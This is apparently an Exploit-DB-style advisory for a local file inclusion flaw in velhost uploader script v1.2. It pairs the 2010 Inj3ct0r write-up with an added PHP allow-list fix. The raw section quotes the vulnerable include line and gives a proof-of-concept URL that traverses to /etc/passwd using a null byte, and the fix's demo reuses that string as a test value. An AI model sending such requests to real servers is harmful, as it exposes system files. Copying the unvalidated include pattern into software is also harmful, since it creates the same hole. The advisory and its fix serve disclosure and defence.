Vendor: velhost uploader script
By: cr4wl3r
CVSS: 7.5 (HIGH)
Vulnerability: Local File Inclusion
CWE: 98
Product Name: velhost uploader script
Affected Version From: v1.2
Affected Version To: v1.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

velhost uploader script v1.2 Local File Inclusion Vulnerability

velhost uploader script v1.2 is vulnerable to Local File Inclusion. The 'upload.php' script uses the user-supplied 'language' parameter without proper validation, so an attacker who passes malicious input in that parameter can include arbitrary files from the local system.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
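
One way to apply this input validation to the `include("./lang/$language.php");` line quoted in the advisory, as an added example that is not part of the original advisory or velhost's own code. The function name `resolve_language_file`, the `english` default and the temporary demo directory are assumptions made for illustration.

```php
<?php
// Added example; not velhost's code. The lang directory layout and the
// 'english' default are assumptions.

function resolve_language_file(string $requested, string $langDir, string $default = 'english'): string
{
    // Allow-list built from the files actually shipped in the language directory.
    $available = array_map(
        fn(string $p): string => basename($p, '.php'),
        glob($langDir . '/*.php') ?: []
    );

    // Strict shape check: letters, digits, underscore only. This rejects '/',
    // '.', and NUL bytes (the %00 in the PoC truncated the appended '.php'
    // on PHP versions before 5.3.4). Anything else falls back to the default.
    if (!preg_match('/\A[A-Za-z0-9_]{1,32}\z/', $requested)
        || !in_array($requested, $available, true)) {
        $requested = $default;
    }

    // Defence in depth: canonicalise and confirm the file is still inside $langDir.
    $base = realpath($langDir);
    $path = realpath($langDir . '/' . $requested . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('language file not available');
    }
    return $path;
}

// Constructed demo: a temporary language directory and sample parameter values.
$langDir = sys_get_temp_dir() . '/lang_demo_' . bin2hex(random_bytes(4));
mkdir($langDir);
file_put_contents("$langDir/english.php", "<?php return ['upload' => 'Upload'];");
file_put_contents("$langDir/german.php", "<?php return ['upload' => 'Hochladen'];");

$samples = ['german', "../../../../../etc/passwd\0", 'english/../german', ''];
foreach ($samples as $value) {
    $file = resolve_language_file($value, $langDir);
    $strings = include $file;   // only ever a file from the allow-list
    printf("%-34s -> %s (%s)\n", json_encode($value, JSON_UNESCAPED_SLASHES),
        basename($file), $strings['upload']);
}

// Clean up the constructed files.
array_map('unlink', glob("$langDir/*.php"));
rmdir($langDir);
```

Only the exact name `german` selects a non-default file; the traversal string from the PoC, the mixed path and the empty value all resolve to the default language file.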

Exploit-DB raw data:

===============================================================
velhost uploader script v1.2 Local File Inclusion Vulnerability
===============================================================

[+] velhost uploader script v1.2 Local File Inclusion Vulnerability

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    ######################################            1
0                    I'm cr4wl3r  member from Inj3ct0r Team            1
1                    ######################################            0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered by: cr4wl3r
[+] Advisories: http://shell4u.oni.cc/home/exploits/velhost.txt
[+] Code [upload.php]

include("./lang/$language.php");

[+] PoC: [path]/pages/upload.php?language=../../../../../etc/passwd%00



# Inj3ct0r.com [2010-04-02]